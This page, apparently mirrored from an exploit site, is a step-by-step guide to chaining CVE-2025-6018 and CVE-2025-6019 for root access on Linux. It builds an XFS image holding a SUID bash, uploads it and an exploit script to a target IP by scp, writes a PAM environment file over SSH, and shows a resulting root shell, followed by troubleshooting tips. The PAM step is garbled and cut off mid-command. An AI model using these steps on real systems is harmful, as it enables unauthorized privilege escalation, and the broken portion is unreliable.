Share
## https://sploitus.com/exploit?id=1BE4E54A-7C91-5C68-810B-767D39FDCA33
# CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Guide
[δΈζ](https://github.com/muyuanlove/CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit/blob/main/readme_zh-cn.md)
## π Quick Exploitation Steps
### Step 1: Prepare XFS Image (Local Machine)
```bash
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image
```
---
### Step 2: Upload Files to Target
```bash
# Upload exploit script and image
scp exp.sh abc@10.129.252.9:~/
scp xfs.image abc@10.129.252.9:~/
```
---
### Step 3: First Login - Configure PAM
```bash
# SSH login to target
ssh phileasfogg3@10.129.252.9
# Write PAM environment variables
cat > ~/.pam_environment β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
bash-5.2# whoami
root
```
---
## π§ Troubleshooting
| Issue | Solution |
| ----------------------------- | ------------------------------------------------ |
| `CanReboot` returns `('no',)` | Make sure you logged out and back in (Step 3) |
| `Not authorized` error | Check `~/.pam_environment` content is correct |
| SUID bash not found | Re-upload `xfs.image` and verify SUID bit is set |
---
## π Key Points
- β
**Must logout and re-login**: PAM config only takes effect in new sessions
- β
**Verify CanReboot**: Confirm it returns `('yes',)` before running script
- β
**Use SSH login**: Don't use `ssh -t user@host "cmd"` style execution
---
## π± Cat Guardian
**If it fails, ensure every step is executed strictly in order!**